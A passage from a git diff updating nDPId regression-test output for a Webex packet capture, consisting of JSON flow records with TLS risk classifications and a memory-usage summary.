Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1444570636364,"flow_last_seen":1444570640403,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":6215,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640310,"flow_last_seen":1444570645707,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.98","src_port":37139,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1444570699916,"flow_last_seen":1444570700460,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1444570700561,"flow_last_seen":1444570713719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1375,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1444570700563,"flow_last_seen":1444570713710,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":980,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1444570713719,"flow_last_seen":1444570715293,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1011,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570636170,"flow_last_seen":1444570639257,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7020,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00916{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1444570636252,"flow_last_seen":1444570640344,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2842,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1444570699916,"flow_last_seen":1444570700460,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1444570700561,"flow_last_seen":1444570713719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1375,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33553,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1444570700563,"flow_last_seen":1444570713710,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":980,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1444570713719,"flow_last_seen":1444570715293,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1011,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"80.74.110.68","src_port":33559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570636170,"flow_last_seen":1444570639257,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7020,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.153","src_port":57647,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00916{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1444570636252,"flow_last_seen":1444570640344,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2842,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47116,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640269,"flow_last_seen":1444570645699,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.202.139","src_port":47135,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1444570699074,"flow_last_seen":1444570740247,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7928,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":1444570624853,"flow_last_seen":1444570630376,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17680,"flow_tot_l4_payload_len":87086,"flow_avg_l4_payload_len":916,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":56,"flow_first_seen":1444570627404,"flow_last_seen":1444570630162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17966,"flow_tot_l4_payload_len":106652,"flow_avg_l4_payload_len":1904,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570628113,"flow_last_seen":1444570628619,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1444570628117,"flow_last_seen":1444570628568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1444570631722,"flow_last_seen":1444570633204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8394,"flow_tot_l4_payload_len":24960,"flow_avg_l4_payload_len":960,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00916{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1444570633357,"flow_last_seen":1444570635974,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8847,"flow_tot_l4_payload_len":40410,"flow_avg_l4_payload_len":1063,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636387,"flow_last_seen":1444570640346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":7463,"flow_avg_l4_payload_len":439,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1444570699074,"flow_last_seen":1444570740247,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7928,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.241.32.14","src_port":46211,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":95,"flow_first_seen":1444570624853,"flow_last_seen":1444570630376,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17680,"flow_tot_l4_payload_len":87086,"flow_avg_l4_payload_len":916,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00821{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":56,"flow_first_seen":1444570627404,"flow_last_seen":1444570630162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17966,"flow_tot_l4_payload_len":106652,"flow_avg_l4_payload_len":1904,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1444570628113,"flow_last_seen":1444570628619,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00813{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1444570628117,"flow_last_seen":1444570628568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1444570631722,"flow_last_seen":1444570633204,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8394,"flow_tot_l4_payload_len":24960,"flow_avg_l4_payload_len":960,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00916{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1444570633357,"flow_last_seen":1444570635974,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8847,"flow_tot_l4_payload_len":40410,"flow_avg_l4_payload_len":1063,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636387,"flow_last_seen":1444570640346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":7463,"flow_avg_l4_payload_len":439,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41386,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640319,"flow_last_seen":1444570652361,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570672215,"flow_last_seen":1444570673280,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":7463,"flow_avg_l4_payload_len":533,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570672215,"flow_last_seen":1444570673280,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":7463,"flow_avg_l4_payload_len":533,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 00567{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","packets-captured":1580,"packets-processed":1580,"total-skipped-flows":0,"total-l4-payload-len":778771,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":53,"total-detection-updates":38,"total-updates":0,"current-active-flows":0,"total-active-flows":57,"total-idle-flows":57,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":383,"global_ts_msec":1444570742172} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1580/1580 @@ -389,9 +389,9 @@ ~~ total active/idle flows...: 57/57 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6218878 bytes -~~ total memory freed........: 6218878 bytes -~~ total allocations/frees...: 120215/120215 +~~ total memory allocated....: 6352512 bytes +~~ total memory freed........: 6352512 bytes +~~ total allocations/frees...: 122977/122977 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 450 chars ~~ json string max len.......: 1859 chars diff --git a/test/results/websocket.pcap.out b/test/results/websocket.pcap.out index 3ed507370..4b4243aeb 100644 --- a/test/results/websocket.pcap.out +++ b/test/results/websocket.pcap.out @@ -2,10 +2,10 @@ 